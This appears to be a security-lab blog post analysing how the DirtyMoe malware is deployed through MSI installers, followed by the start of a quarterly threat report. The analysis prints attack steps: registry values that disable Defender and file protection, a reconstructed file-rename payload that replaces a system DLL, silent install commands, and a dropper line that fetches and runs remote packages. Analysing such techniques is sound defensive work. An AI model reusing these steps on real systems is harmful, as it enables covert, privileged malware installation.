DirtyMoe: Deployment

3 November 2021 at 14:54


In the first article, we described the complex DirtyMoe malware from a high-level point of view. Most of the captured samples were MSI installer packages delivered onto a victim’s machine by the PurpleFox exploit kit. So, in the fourth part of the DirtyMoe series, we will focus on DirtyMoe’s deployment and how DirtyMoe tackles various issues with different versions of Windows.

To understand what the MSI package executes on the victim’s machine, we analyzed the package in terms of registry and file manipulations, the installer’s arguments, and post-reboot operations. We have also tried to put these actions into context to determine the purpose of each individual action in DirtyMoe’s deployment.

The DirtyMoe’s MSI installer abuses the Windows System Event Notification Service (SENS) to deploy DirtyMoe. The main goal of the MSI installer is to replace the system DLL file of SENS with a malicious payload and execute the payload as a legitimate service. Another essential point is configuring the anti-detection methods to keep DirtyMoe under the radar.

The DirtyMoe malware requires different locations of installed files and registry entries for each Windows version that the malware targets. Since the MSI Installer provides a convenient way to install arbitrary software across versions of Windows, its usage seems like a logical choice.

1. Scope

We have recorded two versions of MSI installer packages distributing DirtyMoe. Both versions perform very similar actions for a successful DirtyMoe deployment. The main difference is in the delivery of malicious files via a CAB file. The older version of the MSI package includes the CAB file directly in the package, while the newer version requires the CAB file in the same location as the package itself.

The separate CAB file easily allows managing the payloads that need to be deployed. Further, it reduces the size of the primary exploit payload, because the CAB file can be downloaded after successful exploitation.

1.1 All in One Package (older version)

The example of the all in one package is a sample with SHA-256:

The package details follow:

  • Product Version:
  • Product Code: {80395032-1630-4C4B-A997-0A7CCB72C75B}
  • Install Condition:
    • is Windows NT (cannot be installed on Windows 9x/ME)
    • is not Windows XP SP2 x64 or Windows Server 2003 SP2 x64
    • is not Windows XP/2003 RTM, Windows XP/2003 SP1, Windows XP SP2 x86
    • is not Windows NT 4.0
    • is not Windows 2000
    • not exist SOFTWARE\SoundResearch\UpdaterLastTimeChecked3 with value 3
  • File Size: 2.36 MB
1.2 Excluded Data Package (newer version)

The newer version of the MSI package consists of two parts: the MSI package itself and a separate CAB file containing the malicious payloads. The MSI package refers to one of the following CAB files:,,, ,,, , . The CAB file contains three malicious files, but only one file (sysupdate.log) is different for each CAB file. Detailed information about the file manipulation is described in Section 3.

The example of the newer MSI package is a sample with SHA-256:

The package details follow:

  • Product Version:
  • Product Code: {80395032-1630-4C4B-A997-0A7CCB72C75B}
  • Install Condition:
    • is Windows NT (cannot be installed on Windows 9x/ME)
    • is not Windows XP SP2 x64 or Windows Server 2003 SP2 x64
    • is not Windows XP/2003 RTM, Windows XP/2003 SP1, Windows XP SP2 x86
    • is not Windows NT 4.0
    • is not Windows 2000
    • not exist HKLM\SOFTWARE\Microsoft\DirectPlay8\Direct3D
    • not exist HKCU\SOFTWARE\7-Zip\StayOnTop
  • File Size: 1.020 MB

Note: The product name is usually different for each .msi file. It is a random string of 36 capital letters. The product code has so far been observed with the same value.

2. Registry Manipulation

The malware authors prepare the victim environment to a proper state via the MSI installer. They focus on disabling anti-spyware and file protection features. Additionally, the MSI package uses a system configuration to bypass Windows File Protection (WFP) and overwrite protected files, despite the fact that WFP should prevent replacing critical Windows system files [1].

There are several registry manipulations during MSI installation, though we will describe only the most crucial registry entries.

2.1 Mutex

One of the malware registry entries is UpdaterLastTimeChecked[x], where x signifies how many times the MSI installer has been run. Each MSI installation of the package creates one entry. If UpdaterLastTimeChecked3 is present, any further package installation is not allowed. This applies only to the older version of the MSI package.

This registry manipulation is related only to the newer version. The 7-Zip software does not support a stay-on-top feature. Therefore, it can be assumed that this registry entry serves as a flag that the installer package has been successfully run. SentinelLabs has published evidence that the presence of this value indicates that a victim’s computer has been compromised by PurpleFox [2].

An active instance of the DirtyMoe malware stores settings and meta-data in this registry entry in an encrypted form. Therefore, if this entry is present in the system registry, the MSI installation is aborted.

2.2 Anti-Detection

HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = 1
Microsoft Defender Antivirus can be disabled by setting the DisableAntiSpyware registry key to 1. So, if the system has no 3rd-party antivirus product, the system is left without protection against malicious software, including spyware [3].

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCDisable = 4
Windows File Protection (WFP) prevents non-system applications from replacing critical Windows system files that can cause problems with the operating system integrity and stability. WFP is typically enabled by default in all versions of Windows [4].

Naturally, DirtyMoe wants to avoid a situation where WFP detects any manipulation of the system files. Therefore, the SFCDisable value is set to 4, which keeps WFP enabled but suppresses the GUI pop-ups for WFP actions. The effect is that WFP remains enabled and no system alerts are invoked, but WFP warnings are hidden from users. This is applicable only to Windows XP.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCScan = 0
The System File Checker (SFC) provides the ability to scan system-protected files. SFC verifies file versions, and if it detects any file manipulation, SFC updates files to the correct version. This registry manipulation contributes to disabling SFC protecting the abused Windows service. This setup affects only file scanning, but WFP can still be active.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SvcHostSplitThresholdInKB = 0xFFFFFFFF
The crucial registry manipulation controls the system startup and some aspects of device configuration. To understand the primary purpose of the SvcHostSplitThresholdInKB registry entry, we must describe the historical development of Windows services and a generic host process.

In most cases, Windows services are run from dynamic-link libraries that Windows executes via the generic host process (svchost.exe). The host process can load more services (DLLs) as threads within one process. This is a historical relic from the times of Windows XP, when system memory used to be a scarce commodity. The system used a few service host processes that hosted all Windows services, represented by DLL files, as process creation and maintenance were expensive in terms of system memory.

Figure 1 illustrates an example of running services and detailed information about the biggest host service process. Windows XP created 5 host processes grouped according to their purposes, such as LocalService, NetworkService, and System. PID 1016 is the biggest process from a memory usage point of view, since this process hosts approx. 20 services. This approach saved memory but made the system more unstable, because if one of the services crashed, the entire service chain hosted by the same process was killed.

Figure 1. Service chain in Windows XP

Nowadays, there is no reason to group services within a few processes, and the resulting positive effects are increased system stability and security, as well as easier error analysis. Services now usually no longer share processes; mini-programs for providing system functions have an exclusive memory location. And if the svchost.exe process crashes, it no longer drags the entire service chain with it [5].

Windows 10 has come with a threshold value (SvcHostSplitThresholdInKB) determining when services shall be created as regular processes. The default value is 0x380000 (3,670,016 KB), so the grouping service model is used if the system has less than 3.5 GB of memory. In other words, increasing the threshold value can reduce the number of host processes, and therefore it determines whether the service processes are split.

Let’s give an example for Windows 10: if the value is set to 1, the number of host processes is approx. 70, while a threshold value equal to the maximum (0xFFFFFFFF) causes the number of host processes to be only 26.

It is now understood that the maximum value of SvcHostSplitThresholdInKB can hide details about running processes. Therefore, the malware authors set the threshold value to the maximum to hide the malicious service activity in threads. As a consequence, the malicious service runs within one host process in one of its threads. Accordingly, tracking and forensic analysis are made more difficult, since the svchost process hosts many other services and it is hard to assign system activities to the malware service.

2.3 Payload Delivery

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\SMBDeviceEnabled = 0
In order to prevent deployment of other malware via EternalBlue exploit [6], the MSI installer disables SMB sharing, effectively closing port 445 on Windows XP.

AllowProtectedRenames and PendingFileRenameOperations
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AllowProtectedRenames
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations

These registry entries are also related to WFP and are therefore crucial for deploying the malicious code to the victim machine. The principle is the same as calling the MoveFileEx function with the MOVEFILE_DELAY_UNTIL_REBOOT flag [7]. In other words, the MSI installer defines which files will be moved or deleted after reboot by the Session Manager Subsystem (SMSS) [8].

The malware authors abuse two system files: sens.dll on Windows Vista and newer, and cscdll.dll on Windows XP; see Section 3. Consequently, the SMSS replaces these critical system files with the malicious ones after the system reboots.

An example of the PendingFileRenameOperations value for Windows 7 32-bit is as follows:
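Based on the file operations listed in Section 3.2 and the payload table in Section 3.1 (winupdate32.log on 32-bit systems), the REG_MULTI_SZ value would plausibly contain pairs like these. This is our reconstruction of the documented format, where each operation is a pair of strings, an empty second string means "delete", and a "!" prefix on the destination means "replace existing":

```
\??\C:\Windows\AppPatch\Acpsens.dll
""
\??\C:\Windows\system32\sens.dll
!\??\C:\Windows\AppPatch\Acpsens.dll
\??\C:\Windows\winupdate32.log
!\??\C:\Windows\system32\sens.dll
\??\C:\Windows\AppPatch\Ke583427.xsl
""
\??\C:\Windows\sysupdate.log
!\??\C:\Windows\AppPatch\Ke583427.xsl
```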





3. File Manipulation

DirtyMoe misuses system services, specifically their service DLL files, which are protected and whose handles are held open, so replacing these files is not possible without a system reboot. Therefore, the first phase of the file manipulation extracts the payloads from the CAB file, and the second phase replaces the service DLL files with the extracted payloads.

3.1 File Extraction

The CAB file usually contains three payload files.

  • winupdate32.log and winupdate64.log are malicious DLLs representing the DirtyMoe service.
  • sysupdate.log is an encrypted executable file that contains the default DirtyMoe module injected by the DirtyMoe service.

The MSI installer extracts and copies payloads from the CAB file into defined destinations if an appropriate condition is met, as the following table summarizes.

File            | Destination | Condition
sysupdate.log   | %windir%    | None
winupdate32.log | %windir%    | NOT VersionNT64
winupdate64.log | %windir%    | VersionNT64

If the required files are extracted into the proper destination, the MSI installer ends and waits silently for the system to reboot. The next actions are performed by the SMSS.
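The conditional extraction in the table boils down to a check of the VersionNT64 MSI property; a minimal sketch of that logic (the function name is ours):

```python
def cab_payload_destinations(version_nt64):
    """Map CAB payloads to their drop location based on the
    VersionNT64 MSI property (set only on 64-bit Windows)."""
    payloads = {"sysupdate.log": "%windir%"}  # extracted unconditionally
    if version_nt64:
        payloads["winupdate64.log"] = "%windir%"
    else:
        payloads["winupdate32.log"] = "%windir%"
    return payloads

print(sorted(cab_payload_destinations(True)))   # ['sysupdate.log', 'winupdate64.log']
print(sorted(cab_payload_destinations(False)))  # ['sysupdate.log', 'winupdate32.log']
```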

3.2 File Replacement

The Session Manager Subsystem (SMSS) replaces the abused, system-protected files with the malicious ones based on the PendingFileRenameOperations registry entry; see Section 2.3. In effect, the MSI installer queues post-reboot file manipulations that depend on the Windows version, as follows:

Windows XP

  • Delete (if exist) %windir%\\AppPatch\\Acpcscdll.dll
  • Move %windir%\\system32\\cscdll.dll to %windir%\\AppPatch\\Acpcscdll.dll
  • Move %windir%\\winupdate32.log to %windir%\\system32\\cscdll.dll
  • Delete (if exist) %windir%\\AppPatch\\Ke583427.xsl
  • Move %windir%\\sysupdate.log to %windir%\\AppPatch\\Ke583427.xsl

Windows Vista and newer

  • Delete (if exist) %windir%\\AppPatch\\Acpsens.dll
  • Move %windir%\\system32\\sens.dll to %windir%\\AppPatch\\Acpsens.dll
  • Move %windir%\\winupdate64.log to %windir%\\system32\\sens.dll
  • Delete (if exist) %windir%\\AppPatch\\Ke583427.xsl
  • Move %windir%\\sysupdate.log to %windir%\\AppPatch\\Ke583427.xsl

The difference between Windows XP and Windows Vista and newer lies in which hosting service is abused. On Windows XP it is the Offline Network Agent (cscdll.dll), loaded by winlogon.exe under NT AUTHORITY\SYSTEM privileges. Windows Vista and newer provide the System Event Notification Service (sens.dll), also run under SYSTEM. The Ke583427.xsl file is the encrypted default DirtyMoe module.

In short, the post-reboot operation slips the DirtyMoe DLL into the system folder under the name of a service that is legitimately registered in the system. Replacing such system files is possible because it is done by SMSS, the first user-mode process started by the kernel: at that point no handles to the system DLLs exist yet, and WFP is not running either. Finally, the malware represented by the planted malicious DLL starts with system-level privileges, since the abused service is registered as a legitimate Windows service.

4. Deployment Workflow

If PurpleFox successfully exploits a victim's machine, the MSI installer package is run with administrator privileges. The MSI installer provides several options for installing software silently, so no user interaction is required. Although a system restart is necessary to apply all changes, the MSI installer also supports a delayed restart; therefore, the user does not notice any suspicious symptoms. The installer simply waits for the next system restart.

An example of how to run the installation silently via the MSI installer:
msiexec.exe /i <dirtymoe.msi> /qn /norestart
where /qn sets the UI level to "no UI".

We have captured a specific example of how the MSI installer is run after the successful system exploit.
Cmd /c for /d %i in ( do Msiexec /i http:\%i\ \Q

This dropper iterates over five IP addresses, including ports, that change every minute; see Section 2 of the first part of the DirtyMoe series. The MSI installer is run for each IP address with the \Q parameter, so if the requested remote location is unavailable or the MSI file does not exist, the installer does not show the user any error. The deployment process thus runs silently in the background.

The MSI installer sets the system registry entries defined in Section 2 and copies the malicious files to the Windows folder; see Section 3. The subsequent system restart triggers execution of the malicious DLL containing ServiceMain, which Windows starts as the SENS service. Given the complexity of the malicious service, we will return to its detailed description in the following blog post.

Usually, the MSI installer caches installation files in C:\Windows\Installer for future use, such as updating or reinstalling. However, DirtyMoe does not keep the .msi backup file. The installer only creates a hash file recording the malware installation. The filename has the form SourceHash{<Product Code>}, and the file contains the name of the MSI source package. The most prevalent GUID is: {80395032-1630-4C4B-A997-0A7CCB72C75B}
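This leftover file makes for an easy indicator of compromise to hunt for; a minimal sketch of such a check (function names are ours):

```python
import os

# Product code reported as most prevalent for DirtyMoe installations
DIRTYMOE_PRODUCT_CODE = "{80395032-1630-4C4B-A997-0A7CCB72C75B}"

def sourcehash_name(product_code):
    """Build the cache filename the MSI installer leaves behind."""
    return "SourceHash" + product_code

def sourcehash_present(installer_dir=r"C:\Windows\Installer",
                       product_code=DIRTYMOE_PRODUCT_CODE):
    """Return True if the SourceHash artifact exists in the installer cache."""
    return os.path.exists(os.path.join(installer_dir, sourcehash_name(product_code)))
```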

The MSI Installer Rollback Script cannot remove the malware, since the deployed files have been moved by the SMSS and are therefore out of the MSI Installer's scope.

The whole deployment workflow is illustrated in Figure 2.

Figure 2. DirtyMoe deployment workflow

5. Conclusion

We have introduced the deployment process of the DirtyMoe malware via the MSI Installer that presents an easy way of supporting multiple configurations for various Windows versions. The MSI installer prepares all necessary files and configuration for successful deployment of the malware and also cleans up backup and cache files. However, there are a few symptoms that can reveal the DirtyMoe installations.

After the system reboot, the Session Manager overwrites one of the system service DLLs with the malicious DLL file. The system then starts the corresponding service and thereby loads the malicious code, including the default DirtyMoe object, as a legitimate service.

All these steps deploy and run DirtyMoe on the victim's machine. In terms of the cyber kill chain, detailed information about the DirtyMoe service and further installation actions will be presented in a future article.


[1] Description of the Windows File Protection feature
[2] Purple Fox EK
[3] Security Malware Windows Defender
[4] Enable or Disable Windows File Protection
[5] Split Threshold for svchost.exe in Windows 10
[6] EternalBlue
[7] MoveFileExA function (winbase.h)
[8] Pending FileRename Operations

The post DirtyMoe: Deployment appeared first on Avast Threat Labs.

Avast Q3’21 Threat Report

16 November 2021 at 12:58

Latest Avast Q3’21 Threat Report reveals elevated risk for ransomware and RAT attacks, rootkits and exploit kits return.


The threat landscape is a fascinating environment that is constantly changing and evolving. What was an unshakeable truth for a long time may no longer be valid the next day; the most prevalent threats suddenly disappear, usually to be quickly replaced by at least two new ones; and the bad guys behind these threats always come up with new techniques in pursuit of their profit.

Together with my colleagues, we came to the conclusion that it would be selfish to keep our insight into this landscape just for ourselves, so we decided to start publishing periodic Avast threat reports. Here, we would like to share details about emerging threats, the stories behind malware strains and their spreading, and of course stats from our 435M+ endpoint telemetry.

So let us start with the Q3 report, and I must say it was a juicy quarter. To give you a sneak peek of the report: my colleagues published details about an ongoing APT campaign targeting the Mongolian certification authority MonPass. Another novel piece of research was the discovery of the Crackonosh cryptomining malware, which earned its operators more than $2 million USD. We were also intently monitoring which botnet would replace the previous kingpin, Emotet, in Q3. Furthermore, there was rampant spreading of banking trojans on mobile (especially FluBot), and rootkits on Windows almost doubled their activity in September compared to the previous period. And for me, it started on the night of July 2 with the Sodinokibi/REvil ransomware supply chain attack on the Kaseya MSP: it abused Microsoft Defender, it involved world leaders, and its timing was precise (happening during my threat labs duty – respect to all infosec fellows who were dealing with it over that Independence Day weekend). As I said – it’s a fascinating environment…

Jakub Křoustek, Malware Research Director


This report is structured as two main sections – Desktop, informing about our intel from Windows, Linux, and MacOS, and Mobile, where we inform about Android and iOS threats.

Furthermore, we use the term risk ratio in this report to express the severity of particular threats. It is calculated as a monthly average of the number of attacked users divided by the number of active users in a given country. Unless stated otherwise, the risk ratio is only available for countries with more than 10,000 active users per month.
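The definition above can be sketched as a small helper (function names and sample numbers are ours):

```python
def monthly_risk_ratio(attacked_users, active_users):
    """Risk ratio for one month: the share of active users that were attacked."""
    return attacked_users / active_users

def quarterly_risk_ratio(monthly_counts):
    """Average of the monthly ratios over a quarter, per the definition above.
    monthly_counts: list of (attacked_users, active_users) tuples."""
    ratios = [monthly_risk_ratio(a, n) for a, n in monthly_counts]
    return sum(ratios) / len(ratios)
```

So a country where 1%, 2%, and 3% of active users were attacked in the three months of a quarter would have a quarterly risk ratio of 2%.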


Advanced Persistent Threats (APTs)

In Q3 of 2021, we saw APT activity on several fronts: continued attacks against Certificate Authorities (CAs), the Gamaredon group targeting military and government targets, and campaigns in Southeast Asia.

Certificate Authorities (CAs) are always of increased interest to APT groups, for multiple reasons. By their very nature, CAs enjoy a high level of trust, and they often provide services to government organisations or are part of one themselves, making them a perfect target for supply chain attacks. A well-known example was the targeting of the Vietnam Government Certification Authority in 2020. In Q3, Avast also wrote about activity targeting the Mongolian CA MonPass.

At the very beginning of Q3, Avast researchers discovered and published a story about an installer, downloaded from the official website of MonPass, a major certification authority (CA) in Mongolia in East Asia, that was backdoored with Cobalt Strike binaries.

A public web server hosted by MonPass was breached potentially eight separate times: we found eight different webshells and backdoors on this server. The MonPass client available for download from 8 February 2021 until 3 March 2021 was backdoored. The adversaries used steganography to deliver and decrypt the Cobalt Strike beacons.

Additionally, during the last few months we’ve seen increased activity from the Gamaredon group, primarily in Ukraine. The main targets of the group remain military and government institutions. The group keeps utilizing the old techniques it’s been using for years, in addition to a few new tools in its arsenal. Malware associated with Gamaredon was among the most prevalent among the APT groups we tracked this quarter.

Groups operating in Southeast and East Asia were active during this period as well. We’ve seen multiple campaigns in Myanmar, the Philippines, Hong Kong, and Taiwan. The majority of the actors in the region can be identified as Chinese-speaking groups. The technique of choice among these groups remains DLL sideloading. We’ve seen samples whose main functionality is to search a victim’s machine for potential sideloading candidates, so they are not going to abandon this technique anytime soon.

Luigino Camastra, Malware Researcher
Igor Morgenstern, Malware Researcher
Michal Salát, Threat Intelligence Director


Old botnets still haven’t said their last word. After Emotet’s takedown at the start of 2021, Trickbot has been aspiring to become its successor; despite numerous takedown attempts, Trickbot is still thriving. Qakbot came up with a rare change in its internal payload, which brought restructured resources. As for Ursnif (aka Gozi), the activity in Q3 kept its usual pace, with new webinjects and new builds being continuously released. However, Ursnif’s targets remain largely the same – European, and especially Italian, banks and other financial organisations. Surprisingly, Phorpiex seems to have maintained its presence, even though its source code was reportedly put up for sale in August. This is especially true in Afghanistan, Turkmenistan, and Yemen, where Phorpiex is especially prolific, significantly contributing to their above-average risk ratios.

Below is a heatmap showing the distribution of botnets that we observed in Q3 2021.

The IoT and Linux bot landscape is a wild west, as usual. We are still seeing many Gafgyt and Mirai samples trying to exploit their way onto various devices. The trend of these families borrowing code from each other continues, so while we sometimes see samples worthy of being called a new strain, many samples continue to blur the line between the Gafgyt and Mirai strains. We expect this trend to continue: both strains have their source code available, and the demand for DDoS is not lessening. Due to their popularity, the source code is also often used by technically less proficient adversaries, which partially explains the code-reuse trend.

Q3’s surprise was the MyKings botnet, which ran quite a profitable campaign: its cryptocurrency clipboard-swapping campaign managed to amass approximately 25 million dollars in Bitcoin, Ethereum, and Dogecoin.

Changes in malware distribution methods

In Q3 2021, we saw a shift in bot and RAT distribution. Threat actors are finding new ways of abusing third party infrastructure. While we have previously seen various cloud storages (e.g. OneDrive) or Pastebin, we are also seeing more creative means such as Google’s for C&C URLs or Discord’s CDN as a distribution channel. This makes it easier for them to avoid reputation services meant to combat malware distribution, though at the cost that their channels may get disrupted by the service provider. Since we’ve already seen communication platforms such as Discord or Telegram being also abused for exfiltration or as C&C, we can expect this trend to spread to other similar automation-friendly services.

Adolf Středa, Malware Researcher 

Infrastructure as a service for malware

Infrastructure-as-a-service for malware and botnets appears to be on the rise, built on commodity routers and IoT devices. Threat actors have realized that it’s far easier to misuse these devices as proxies to hide malicious activity than to craft specific malware for such a variety of architectures and devices. We also seem to be witnessing botnets of enslaved devices being sold as a service to various threat actors.

In Q2 and Q3, we saw a new campaign dubbed Mēris. This campaign abused MikroTik routers, already known to be problematic since 2018, for DDoS attacks against Yandex servers. Further analysis showed that this attack was just one of the campaigns run through a MikroTik botnet-as-a-service providing anonymizing proxies. It turned out that the botnet consisted of approximately 200K enslaved devices with an open SOCKS proxy, ready for hire on darknet forums. It’s believed that this actor has been controlling the botnet since 2018; moreover, there are ties to Glupteba and to coin mining campaigns in 2018. Although most of the botnet has been taken down, the original culprit and the vulnerabilities in the MikroTik routers still seem to be open. The attack vector is notoriously well-known and is common to most IoT and router devices: unpatched firmware and default credentials. We’ll inevitably see more of this trend in the future.

Below is a heatmap showing the prevalence of unpatched Mikrotik routers in Q3 2021.

Martin Hron, Malware Researcher


Coinminers are malware that hijack the resources of infected PCs to mine cryptocurrency and send the profit directly to the attacker, while the electricity bill is left to the victim. The number of users attacked by coinminers stayed steady or even decreased slightly in Q3 2021 compared to the beginning of the year, as shown below.

It is possible that this stagnant or even declining trend is due to the prices of cryptocurrencies. The prices of Bitcoin, Ethereum, and Monero were on the low end from the end of May until the end of July. Q3 saw a significant sell-off of Bitcoin, especially in response to increased signals that the Chinese government would move to regulate cryptocurrency. As a consequence, the number of coinmining attacks we saw in Q3 was low and we did not observe any new threats.

The most prevalent mining software used in coinminers was still XMRig (28%). The geographical distribution of coinminers is almost the same as in Q2, as shown below.

It is hard to estimate how much attackers have earned by mining, because they usually use hard-to-trace cryptocurrencies such as Monero. But we have some pieces of the puzzle: we were able to track some payments for the Crackonosh malware. Our analysis shows that it has mined over $2 million USD since 2018. Crackonosh represents only about 2% of all coinminer attacks we see in our userbase. It is bundled with cracked copies of popular games, uses Windows Safe Mode to uninstall antimalware software (note that Avast users are protected against this tactic), and then installs XMRig to mine Monero.

Daniel Beneš, Malware Researcher


Q3 was a thrilling quarter from the ransomware perspective. One can almost get used to daily newspaper headlines about ransomware breaches and attacks on large companies (e.g. the Olympus and Newcoop attacks by the BlackMatter ransomware), but at the same time, we witnessed a huge supply chain attack of a kind not seen for a while, the involvement of state leaders in addressing it, and much more.

Overall, Q3 ransomware attacks were 5% higher than in Q2 and even 22% higher than in Q1 2021.

At the very beginning of Q3 (July 2), we spotted an attack by the Sodinokibi/REvil ransomware, delivered via a supply chain attack on the Kaseya MSP. The impact was massive: more than 1,500 businesses were targeted. Other parts of the attack were fascinating as well. This particular cybercriminal group used a DLL sideloading vulnerability in Microsoft Defender to deliver the target payload, which could have confused some security solutions; we had already seen abuse of this particular Defender application in May 2020. Overall, we noticed and blocked this attack on more than 2.4k endpoints, based on our telemetry. The story of this attack continued over Q3 with the involvement of presidents Joe Biden and Vladimir Putin, resulting in the ransomware operators releasing the decryption key, which helped unlock the files of affected victims. It also gave us one more clue for attributing the origin of this (R)evil. After the release of the decryption key, Sodinokibi went silent for almost two months: its infrastructure went down, no new variants were seen in the wild, etc. However, it was us who detected (and blocked) its latest variant on September 9. This story evolved further in November, but let’s keep that for the Q4 report.

However, Sodinokibi was only one piece of the ransomware threat landscape puzzle in Q3. The top spreading strains overall were:

  • STOP/Djvu – often spread via infected pirated software
  • WannaCry – the one and only, still spreading after four years via the EternalBlue exploit
  • CrySiS – also spreading for a long time via hacked RDP
  • Sodinokibi/REvil
  • Various strains derived from open-source ransomware (HiddenTear, Go-ransomware, etc.)

Furthermore, there were multiple active strains focused on targeted attacks on businesses, such as BlackMatter (previously DarkSide) and various ransomware strains from the Evil Corp group (e.g. Grief) and Conti.

The heat map below shows the risk ratio of users protected against ransomware in Q3 2021.

As shown below, the distribution of ransomware attacks was very similar to previous quarters, except for a 600% increase in Sweden, primarily caused by the aforementioned Kaseya supply chain attack.


The number of users protected from ransomware attacks was highest in July and decreased slightly in August and September.

Jakub Křoustek, Malware Research Director

Remote Access Trojans (RATs)

Unlike ransomware, RAT campaigns rarely make newspaper headlines because of their secretive nature. Ransomware needs to let you know that it is present on the infected system, but RATs try to stay stealthy and silently spy on their victims. The less visible they are, the better for the threat actors.

In Q3, three new RAT variants came to our attention: FatalRAT with its anti-VM capabilities, VBA RAT, which exploited the Internet Explorer vulnerability CVE-2021-26411, and finally a new version of Reverse RAT (build number 2.0), which added webcam photo capture, file stealing, and anti-AV capabilities.

These new Remote Access Trojans haven’t drastically changed the distribution of RATs in the wild yet, however.

We saw an elevated risk ratio for RATs in many countries all over the world; in particular, we had to protect more users in countries such as Russia, Singapore, Bulgaria, and Turkey this quarter.

In the heat map below, we can see the risk ratio for RATs globally in Q3 2021. 

Distribution of RAT risk ratio worldwide

Out of all users attacked by RATs in Q3, 19% were attacked by njRAT (also known as Bladabindi). njRAT has been spreading since 2012 and owes its popularity to the fact that it was open-sourced a long time ago, and many different variants have been built on top of its VB.NET source code. After njRAT, the most prevalent RAT strains were:

  • Remcos ‒ 11%
  • AsyncRat ‒ 10%
  • NanoCore ‒ 9%
  • Warzone ‒ 6%
  • QuasarRAT ‒ 5%
  • NetWire ‒ 5%
  • DarkComet ‒ 4%

What made these RATs so popular, and why did they spread the most? The answer is simple: all of them were either open-sourced or cracked, which boosted their popularity especially among less sophisticated script-kiddie attackers and among users of the many hacking forums where they were often shared. njRAT, Remcos, AsyncRat, NanoCore, and QuasarRAT were open-sourced, and the rest were cracked. From this list, only Warzone had a working paid-subscription model from its original developer. Attackers used these RATs especially for industrial espionage, credential theft, stalking, and, with enough infected computers, even DDoS.

Samuel Sidor, Malware Researcher


A rootkit is malicious software designed to give unauthorized access with the highest system privileges. Rootkits commonly provide services to other malware in user mode, typically including functionality such as concealing malware processes, files, and registry entries. In general, rootkits have total control over a system because they operate in the kernel layer, including the ability to modify critical kernel structures. Rootkits remain a popular technique for hiding malicious activity despite the high risk of being detected, because working in kernel mode means each critical bug can lead to a BSoD.

We have recorded a significant increase in rootkit activity at the end of Q3, illustrated in the chart below. While we can’t be sure what’s behind this increase, this is one of the most significant increases in activity in Q3 2021 and is worth watching. It also underscores that defenders should be aware that rootkits, which have been out of the spotlight in recent years, remain a threat and in fact are increasing once again.


The graph below demonstrates that China and adjacent administrative areas (Macao, Taiwan, Hong Kong) were the regions most at risk in terms of protected users in Q3 2021.

In Q3, we also became interested in analyzing the code-signing of a rootkit driver that protects the malicious activity of DirtyMoe, a complex and modularized backdoor focused on Monero mining that utilizes sophisticated C&C communication, self-protection mechanisms, and a wide variety of modules performing various suspicious tasks.

This research led us to the issue of Windows drivers signed with revoked certificates. We identified three revoked certificates that sign the DirtyMoe rootkit and also sign other rootkits. Most attacked users were in Russia (40%), China (20%), and Ukraine (10%).

Martin Chlumecký, Malware Researcher

Information Stealers

In Q3, we saw a steady increase in the numbers of various information stealers, as can be seen in the daily spreading chart below.


The risk ratio of this threat is globally high and similar across the majority of countries worldwide with peaks in Africa and the Middle East.

One such stealer is a clipboard stealer, distributed by the notorious MyKings botnet, that focuses on swapping cryptocurrency wallet addresses present in the victim’s clipboard with an attacker’s address. When the victim copies data into the clipboard, the malware tries to find specific patterns in its content (such as a web page link or the format of a cryptocurrency wallet address), and if one is found, the content is replaced with the attacker’s information. Using this simple technique, the victim thinks, for instance, that they pasted a friend’s cryptowallet address, while the attacker has changed the address in the meantime to their own, effectively redirecting the money.

MyKings also changes two kinds of links when present in the victim’s clipboard: Steam trade offer links and Yandex Disk storage links. This way, the attacker redirects the Steam trade offer from the victim to himself, handing the trade, and the money, over to the attacker. Furthermore, when the user wants to share a file via the Yandex Disk cloud storage service, the web link is replaced with a malicious one, leading the victim to download further malware, because there is no reason to suspect a link received from a friend.
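The pattern matching itself is straightforward; a defensive sketch of the same idea, usable as a clipboard guard rather than a stealer (the regexes are simplified and ours, not taken from MyKings):

```python
import re

# Simplified address-format patterns; real malware of this kind watches
# for 20+ currencies plus Steam and Yandex Disk links.
WALLET_PATTERNS = {
    "BTC": re.compile(r"^(1|3|bc1)[a-zA-Z0-9]{25,59}$"),
    "ETH": re.compile(r"^0x[a-fA-F0-9]{40}$"),
}

def classify_clipboard(text):
    """Return the currency whose address format the clipboard content
    matches, or None. A clipboard guard could warn the user on a match
    (e.g. before pasting an address into a payment field)."""
    for coin, pattern in WALLET_PATTERNS.items():
        if pattern.match(text.strip()):
            return coin
    return None

print(classify_clipboard("1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"))  # BTC
print(classify_clipboard("hello world"))                          # None
```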

Our research has shown that, since 2019, the operators behind MyKings have amassed at least $24 million USD (and likely more) as of October 5, 2021, in the Bitcoin, Ethereum, and Dogecoin cryptowallets associated with MyKings. While we can’t attribute this amount solely to MyKings, it still represents a significant sum tied to MyKings activity. Beyond the cryptocurrencies mentioned above, the clipboard stealer also targets more than 20 different cryptocurrencies, further leveraging the popularity of the cryptocurrency world. In Q3, MyKings was most active in Russia, Pakistan, and India.

Furthermore, BluStealer is a new and emerging stealer, first seen at the beginning of Q3, whose activity spiked around September 10-11. Primarily distributed through phishing emails, BluStealer is capable of stealing credentials stored in web browsers and crypto wallet data, hijacking crypto wallet addresses in the clipboard, and uploading document files. The current version of BluStealer uses SMTP (email) and the Telegram Bot API for data exfiltration.

Jan Rubín, Malware Researcher
Jakub Kaloč, Malware Researcher
Anh Ho, Malware Researcher

Technical support scams

Tech support scams (TSS for short) are big business, and the people behind them use a number of techniques to try to convince you that you need their help. Most of the techniques these websites use are aimed at making your browser and system seem broken.

This topic has become very popular on YouTube and TikTok, as it attracted the attention of “scambaiters”, a type of vigilante who disrupts, exposes, or even scams the world’s scammers.

We’ve seen a growing trend of TSS attacks, with a peak at the end of August, as shown below.


Overall, the distribution of TSS attacks globally in Q3 2021 can be seen below.

We’ve divided these fraudsters into groups according to geography and similar attack patterns. These groupings can include multiple fraud groups that use the same tool, or use similar browser locking methods. The following table represents the unique hits for each group.

